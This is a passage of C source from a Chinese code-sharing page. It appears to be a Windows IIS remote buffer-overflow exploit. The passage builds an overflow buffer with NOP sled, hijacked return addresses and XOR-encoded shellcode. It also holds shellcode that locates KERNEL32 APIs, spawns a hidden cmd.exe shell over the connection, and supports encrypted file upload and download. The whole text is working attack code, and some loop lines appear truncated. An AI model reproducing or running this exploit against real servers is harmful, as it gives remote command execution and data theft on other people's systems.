}
memset(buff,NOPCODE,BUFFSIZE);
if(argc>4){
memcpy(buff,argv[4],strlen(argv[4]));
}
else memcpy(buff,buff1,strlen(buff1));
memcpy(buff+OVERADD+NOPLONG,shellcodefnadd+k+4,0x80);
shellcodefnadd=shellcodefn;
temp=*shellcodefnadd;
if(temp==0xe9) {
++shellcodefnadd;
k=*(int *)shellcodefnadd;
shellcodefnadd+=k;
shellcodefnadd+=4;
}
for(k=0;k<=0x1000;++k){
if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
}
memcpy(shellcodebuff,shellcodefnadd,k);
cleanchkesp(shellcodefnadd,shellcodebuff,chkespadd,k);
for(i=0;i<0x400;++i){
if(memcmp(str+i,"strend",6)==0) break;
}
memcpy(shellcodebuff+k,str,i);
sendpacketlong=k+i;
for(k=0;k<=0x200;++k){
if(memcmp(buff+OVERADD+NOPLONG+k,fnendstr,FNENDLONG)==0) break;
}
for(i=0;i temp=shellcodebuff[i];
temp^=DATAXORCODE;
if(temp<=0x10||temp==' '||temp=='.'||temp=='/'||temp=='\\'||temp=='0'||temp=='?'||temp=='%'){
buff[OVERADD+NOPLONG+k]='0';
++k;
temp+=0x40;
}
buff[OVERADD+NOPLONG+k]=temp;
++k;
}
// memcpy(buff+OVERADD+NOPLONG+k,shellcodebuff,sendpacketlong);
// k+=sendpacketlong;
for(i=-0x30;i<0x30;i+=4){
memcpy(buff+ADD1+offset+i,eipexcept,4);
memcpy(buff+ADD2+offset+i,eipexcept,4);
}
for(i=-0x30;i<0x30;i+=4){
memcpy(buff+OVERADD+i,eipexcept,4);
}
memcpy(buff+OVERADD+i,eipwinnt2,4);
memcpy(buff+OVERADD+i+4,reteax,4);
memcpy(buff+OVERADD+i+8,eipwinnt,4);
memcpy(buff+OVERADD+i+0x0c,eipwinnt,4);
memcpy(buff+OVERADD+i+0x10,eipjmpshell,7);
// fprintf(stderr,"\n send:\n %s",buff);
fprintf(stderr,"\n offset:%d",offset);
/*
if(argc>2){
server=argv[2];
if(strcmp(server,"win9x")==0){
memcpy(buff+OVERADD,eipwin9x,4);
fprintf(stderr,"\n nuke win9x.");
}
if(strcmp(server,"winnt")==0){
memcpy(buff+OVERADD,eipwinnt,4);
fprintf(stderr,"\n nuke winnt.");
}
}
*/
sendpacketlong=k+OVERADD+NOPLONG;
strcpy(buff+sendpacketlong,buff2);
strcpy(buff+sendpacketlong+strlen(buff2),server);
strcpy(buff+sendpacketlong+strlen(buff2)+strlen(server),"\n\n");
// printf("\n send buff:\n%s",buff);
// strcpy(buff+OVERADD+NOPLONG,shellcode);
sendpacketlong=strlen(buff);
/*
#ifdef DEBUG
_asm{
lea esp,buff
add esp,OVERADD
ret
}
#endif
*/
if(argc>6){
if(strcmp(argv[6],"debug")==0){
_asm{
lea esp,buff
add esp,OVERADD
ret
}
}
}
xordatabegin=0;
for(i=0;i<1;++i){
j=sendpacketlong;
fprintf(stderr,"\n send packet %d bytes.",j);
send(fd,buff,j,0);
k=newrecv(fd,recvbuff,0x1000,0);
if(k>=8&&memcmp(recvbuff,"XORDATA",8)==0) {
xordatabegin=1;
k=-1;
fprintf(stderr,"\n ok!\n");
}
if(k>0){
recvbuff[k]=0;
fprintf(stderr,"\n recv:\n %s",recvbuff);
}
}
k=1;
ioctlsocket(fd, FIONBIO, &k);
// fprintf(stderr,"\n now begin: \n");
lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
lockintvar2=lockintvar1;
k=1;
while(k!=0){
if(k<0){
i=0;
while(i==0){
gets(buff);
if(memcmp(buff,"iisput",6)==0){
iisput(fd,buff+6);
}
else{
if(memcmp(buff,"iisget",6)==0){
iisget(fd,buff+6);
}
else i=1;
}
}
k=strlen(buff);
memcpy(buff+k,SRLF,3);
newsend(fd,buff,k+2,0);
}
k=newrecv(fd,buff,0x1000,0);
if(xordatabegin==0&&k>=8&&memcmp(buff,"XORDATA",8)==0){
xordatabegin=1;
k=-1;
}
if(k>0){
buff[k]=0;
fprintf(stderr,"%s",buff);
}
// if(k==0) break;
}
closesocket(fd);
WSACleanup( );
fprintf(stderr,"\n the server close connect.");
gets(buff);
return(0);
}
void shellcodefnlock()
{
_asm{
nop
nop
nop
nop
nop
nop
nop
nop
_emit('?')
xor ecx,ecx
add si,474h
cmp dword ptr [esi],ecx
jnz getesi
add si,4
getesi: mov esi,[esi]
add si,8
xor ecx,ecx
mov byte ptr [esi],cl
jmp next
getediadd: pop EDI
push EDI
pop ESI
push ebx // ecb
push ebx // call shellcodefn ret address
xor ecx,ecx
looplock: lodsb
cmp al,cl
jz shell
cmp al,0x30
jz clean0
sto: xor al,DATAXORCODE
stosb
jmp looplock
clean0: lodsb
sub al,0x40
jmp sto
next: call getediadd
shell: NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
}
}
void shellcodefn(char *ecb)
{
char Buff[SHELLBUFFSIZE+2];
int *except[3];
FARPROC Sleepadd;
FARPROC GetLastErroradd;
FARPROC GetFileSizeadd;
FARPROC CreateFileAadd;
FARPROC WriteFileadd;
FARPROC ReadFileadd;
FARPROC PeekNamedPipeadd;
FARPROC CloseHandleadd;
FARPROC CreateProcessadd;
FARPROC CreatePipeadd;
FARPROC procloadlib;
FARPROC apifnadd[1];
FARPROC procgetadd=0;
FARPROC writeclient= *(int *)(ecb+0x84);
FARPROC readclient = *(int *)(ecb+0x88);
HCONN ConnID = *(int *)(ecb+8) ;
char *stradd;
int imgbase,fnbase,i,k,l;
HANDLE libhandle,fpt; //libwsock32;
STARTUPINFO siinfo;
PROCESS_INformATION ProcessInformation;
HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;
int lBytesRead;
int lockintvar1,lockintvar2;
char lockcharvar;
SECURITY_ATTRIBUTES sa;
_asm {
jmp nextcall
getstradd: pop stradd
lea EDI,except
mov eax,dword ptr FS:[0]
mov dword ptr [edi+0x08],eax
mov dword ptr FS:[0],EDI
}
except[0]=0xffffffff;
except[1]=stradd-0x07;
imgbase=0x77e00000;
_asm{
call getexceptretadd
}
for(;imgbase<0xbffa0000,procgetadd==0;){
imgbase+=0x10000;
if(imgbase==0x78000000) imgbase=0xbff00000;
if(*( WORD *)imgbase=='ZM'&& *(WORD *)(imgbase+*(int *)(imgbase+0x3c))=='EP'){
fnbase=*(int *)(imgbase+*(int *)(imgbase+0x3c)+0x78)+imgbase;
k=*(int *)(fnbase+0xc)+imgbase;
if(*(int *)k =='NREK'&&*(int *)(k+4)=='23LE'){
libhandle=imgbase;
k=imgbase+*(int *)(fnbase+0x20);
for(l=0;l<*(int *) (fnbase+0x18);++l,k+=4){
if(*(int *)(imgbase+*(int *)k)=='PteG'&&*(int *)(4+imgbase+*(int *)k)=='Acor'){
k=*(WORD *)(l+l+imgbase+*(int *)(fnbase+0x24));
k+=*(int *)(fnbase+0x10)-1;
k=*(int *)(k+k+k+k+imgbase+*(int *)(fnbase+0x1c));
procgetadd=k+imgbase;
break;
}
}
}
}
}
// 搜索KERNEL32。DLL模块地址和API函数 GetProcAddress地址
// 注意这儿处理了搜索页面不在情况。
_asm{
lea edi,except
mov eax,dword ptr [edi+0x08]
mov dword ptr fs:[0],eax
}
if(procgetadd==0) goto die ;
for(k=1;k apifnadd[k]=procgetadd(libhandle,stradd);
for(;;++stradd){
if(*(stradd)==0&&*(stradd+1)!=0) break;
}
++stradd;
}
sa.nLength=12;
sa.lpSecurityDescriptor=0;
sa.bInheritHandle=TRUE;
CreatePipeadd(&hReadPipe1,&hWritePipe1,&sa,0);
CreatePipeadd(&hReadPipe2,&hWritePipe2,&sa,0);
// ZeroMemory(&siinfo,sizeof(siinfo));
_asm{
lea EDI,siinfo
xor eax,eax
mov ecx,0x11
repnz stosd
}
siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
siinfo.wShowWindow = SW_HIDE;
siinfo.hStdInput = hReadPipe2;
siinfo.hStdOutput=hWritePipe1;
siinfo.hStdError =hWritePipe1;
// k=0;
// while(k==0){
k=CreateProcessadd(NULL,stradd,NULL,NULL,1,0,NULL,NULL,&siinfo,&ProcessInformation);
stradd+=8;
// }
PeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0);
k=8;
writeclient(ConnID,stradd+9,&k,0);
lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
lockintvar2=lockintvar1;
while(1){
PeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0);
if(lBytesRead>0){
ReadFileadd(hReadPipe1,Buff,lBytesRead,&lBytesRead,0);
if(lBytesRead>0){
for(k=0;k lockintvar2=lockintvar2*0x100;
lockintvar2=lockintvar2%LOCKBIGNUM;
lockcharvar=lockintvar2%0x100;
Buff[k]^=lockcharvar;
}
writeclient(ConnID,Buff,&lBytesRead,0);
}
}
else{
lBytesRead=SHELLBUFFSIZE;
l=0;
while(l==0){
k=readclient(ConnID,Buff,&lBytesRead);
for(l=0;l lockintvar1=lockintvar1*0x100;
lockintvar1=lockintvar1%LOCKBIGNUM;
lockcharvar=lockintvar1%0x100;
Buff[l]^=lockcharvar;
}
if(k==1&&lBytesRead>4&&Buff[0]=='p'&&Buff[1]=='u'&&Buff[2]=='t'&&Buff[3]==' '){
l=*(int *)(Buff+4);
// WriteFileadd(fpt,Buff,lBytesRead,&lBytesRead,NULL);
fpt=CreateFileAadd(Buff+0x8,FILE_FLAG_WRITE_THROUGH+GENERIC_WRITE,FILE_SHARE_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0)
;
k=GetLastErroradd();
i=0;
while(l>0){
k=readclient(ConnID,Buff,&lBytesRead);
if(k==1){
if(lBytesRead>0){
for(k=0;k lockintvar1=lockintvar1*0x100;
lockintvar1=lockintvar1%LOCKBIGNUM;
lockcharvar=lockintvar1%0x100;
Buff[k]^=lockcharvar;
}
l-=lBytesRead;
WriteFileadd(fpt,Buff,lBytesRead,&lBytesRead,NULL);
}
}
else{
Sleepadd(0100);
++i;
}
if(i>10000) l=0;
}
CloseHandleadd(fpt);
l=0;
}
else{
if(k==1&&lBytesRead>4&&Buff[0]=='g'&&Buff[1]=='e'&&Buff[2]=='t'&&Buff[3]==' '){
fpt=CreateFileAadd(Buff+4,GENERIC_READ,FILE_SHARE_READ+FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
Sleepadd(100);
l=GetFileSizeadd(fpt,&k);
*(int *)Buff='ezis'; //size
*(int *)(Buff+4)=l;
lBytesRead=8;
for(i=0;i lockintvar2=lockintvar2*0x100;
lockintvar2=lockintvar2%LOCKBIGNUM;
lockcharvar=lockintvar2%0x100;
Buff[i]^=lockcharvar;
}
writeclient(ConnID,Buff,&lBytesRead,0);
// Sleepadd(100);
i=0;
while(l>0){
k=SHELLBUFFSIZE;
ReadFileadd(fpt,Buff,k,&k,0);
if(k>0){
for(i=0;i lockintvar2=lockintvar2*0x100;
lockintvar2=lockintvar2%LOCKBIGNUM;
lockcharvar=lockintvar2%0x100;
Buff[i]^=lockcharvar;
}
i=0;
l-=k;
writeclient(ConnID,Buff,&k,0); // HSE_IO_SYNC);
// Sleepadd(100);
}
else ++i;
if(i>100) l=0;
}
CloseHandleadd(fpt);
l=0;
}
else l=1;
}
}
if(k!=1){
k=8;
WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
while(1){
Sleepadd(0x7fffffff); //僵死
}
}
else{
WriteFileadd(hWritePipe2,Buff,lBytesRead,&lBytesRead,0);
// Sleepadd(1000);
}
}
}
die: goto die ;
_asm{
getexceptretadd: pop eax
push eax
mov edi,dword ptr [stradd]
mov dword ptr [edi-0x0e],eax
ret
errprogram: mov eax,dword ptr [esp+0x0c]
add eax,0xb8
mov dword ptr [eax],0x11223344 //stradd-0xe
xor eax,eax //2
ret //1
execptprogram: jmp errprogram //2 bytes stradd-7
nextcall: call getstradd //5 bytes
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
}
}
void cleanchkesp(char *fnadd,char *shellbuff,char * chkesp,int len)
{
int i,k;
unsigned char temp;
char *calladd;
for(i=0;i temp=shellbuff[i];
if(temp==0xe8){
k=*(int *)(shellbuff+i+1);
calladd=fnadd;
calladd+=k;
calladd+=i;
calladd+=5;
if(calladd==chkesp){
shellbuff[i]=0x90;
shellbuff[i+1]=0x43; // inc ebx
shellbuff[i+2]=0x4b; // dec ebx
shellbuff[i+3]=0x43;
shellbuff[i+4]=0x4b;
}
}
}
}
void iisput(int fd,char *str){
char *filename;
char *filename2;
FILE *fpt;
char buff[0x2000];
int size=0x2000,i,j,filesize,filesizehigh;
filename="\0";
filename2="\0";
j=strlen(str);
for(i=0;i if(*str!=' '){
filename=str;
break;
}
}
for(;i if(*str==' ') {
*str=0;
break;
}
}
++i;
++str;
for(;i if(*str!=' '){
filename2=str;
break;
}
}
for(;i if(*str==' ') {
*str=0;
break;
}
}
if(filename=="\x0") {
printf("\n iisput filename [path\\fiename]\n");
return;
}
if(filename2=="\x0") filename2=filename;
printf("\n begin put file:%s",filename);
j=0;
ioctlsocket(fd, FIONBIO, &j);
Sleep(1000);
fpt=CreateFile(filename,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
filesize=GetFileSize(fpt,&filesizehigh);
strcpy(buff,"put ");
*(int *)(buff+4)=filesize;
filesize=*(int *)(buff+4);
strcpy(buff+0x8,filename2);
newsend(fd,buff,i+0x9,0);
printf("\n put file:%s to file:%s %d bytes",filename,filename2,filesize);
Sleep(1000);
while(filesize>0){
size=0x800;
ReadFile(fpt,buff,size,&size,NULL);
if(size>0){
newsend(fd,buff,size,0);
// Sleep(0100);
filesize-=size;
}
}
CloseHandle(fpt);
j=1;
ioctlsocket(fd, FIONBIO, &j);
printf("\n put file ok!\n");
Sleep(1000);
}
void iisget(int fd,char *str){
char *filename;
char *filename2;
FILE *fpt;
char buff[0x2000];
int size=0x2000,i,j,filesize,filesizehigh;
filename="\0";
filename2="\0";
j=strlen(str);
for(i=0;i if(*str!=' '){
filename=str;
break;
}
}
for(;i if(*str==' ') {
*str=0;
break;
}
}
++i;
++str;
for(;i if(*str!=' '){
filename2=str;
break;
}
}
for(;i if(*str==' ') {
*str=0;
break;
}
}
if(filename=="\x0") {
printf("\n iisget filename [path\\fiename]\n");
return;
}
if(filename2=="\x0") filename2=filename;
printf("\n begin get file:%s",filename);
fpt=CreateFileA(filename,FILE_FLAG_WRITE_THROUGH+GENERIC_WRITE,FILE_SHARE_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
strcpy(buff,"get ");
strcpy(buff+0x4,filename2);
newsend(fd,buff,i+0x5,0);
printf("\n get file:%s from file:%s",filename,filename2);
j=0;
ioctlsocket(fd, FIONBIO, &j);
i=0;
filesize=0;
j=0;
while(j<100){
// Sleep(100);
i=newrecv(fd,buff,0x800,0);
if(i>0){
buff[i]=0;
if(memcmp(buff,"size",4)==0){
filesize=*(int *)(buff+4);
j=100;
}
else {
j=0;
printf("\n recv %s",buff);
}
}
else ++j;
// if(j>1000) i=0;
}
printf("\n file %d bytes %d\n",filesize,i);
if(i>8){
i-=8;
WriteFile(fpt,buff+8,i,&i,NULL);
filesize-=i;
}
while(filesize>0){
size=newrecv(fd,buff,0x800,0);
if(size>0){
WriteFile(fpt,buff,size,&size,NULL);
filesize-=size;
}
else {
if(size==0) {
printf("\n ftp close \n ");
}
else {
printf("\n Sleep(100)");
Sleep(100);
}
}
}
CloseHandle(fpt);
printf("\n get file ok!\n");
j=1;
ioctlsocket(fd, FIONBIO, &j);
}
int newrecv(int fd,char *buff,int size,int flag)
{
int i,k;
k=recv(fd,buff,size,flag);
if(xordatabegin==1){
for(i=0;i lockintvar1=lockintvar1*0x100;
lockintvar1=lockintvar1%LOCKBIGNUM;
lockcharvar=lockintvar1%0x100;
buff[i]^=lockcharvar;
}
}
return(k);
}
int newsend(int fd,char *buff,int size,int flag)
{
int i;
for(i=0;i lockintvar2=lockintvar2*0x100;
lockintvar2=lockintvar2%LOCKBIGNUM;
lockcharvar=lockintvar2%0x100;
buff[i]^=lockcharvar;
}
return(send(fd,buff,size,flag));
}
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- windows下强大功能的溢出程序源代码
- C#中windows程序使用播放功能
- 把程序源代码的文件编码统一为UTF8,行结束符使用\n,不要再用Windows下的记事本工具。
- Windows下我喜爱的那些体积小但功能强大的软件
- VB仿Windows的记事本notepad的程序源代码
- 当windows 7系统中程序和功能无法卸载IE9,10,11时的方法
- Windows 7系统如何设置允许程序或功能通过防火墙?
- WINDOWS下的溢出程序编写技巧
- 应用程序复原:取消锁定 Windows 安装程序的隐藏功能
- source code analyzer 功能强大的C/C++源代码分析软件 Celerity CRACK 破解版
- Android开发Log最佳实践-一个简单、漂亮、功能强大的Android日志程序:logger
- 当windows 7系统中程序和功能无法卸载IE9,10,11时的方法
- Windows Remote Control Server程序作品+源代码
- 显示远程主机图形窗口程序-------SSH的强大功能
- 利用PHP安装windows自动运行的服务,PHP程序可以实现长时间、自动运行、定时更新功能,直接可以用在项目中的类源代码
- 详解 如何在 windows 7添加启动项 ,强大的计划任务功能 推荐
- windows技巧——notepad2 取代自带 notepad ,功能强大!
- 使用CMS方法开发功能强大的Web程序
- 功能强大表格控件Spread for Windows Forms 中文版发布
- windows 通用快捷键定义 及 程序功能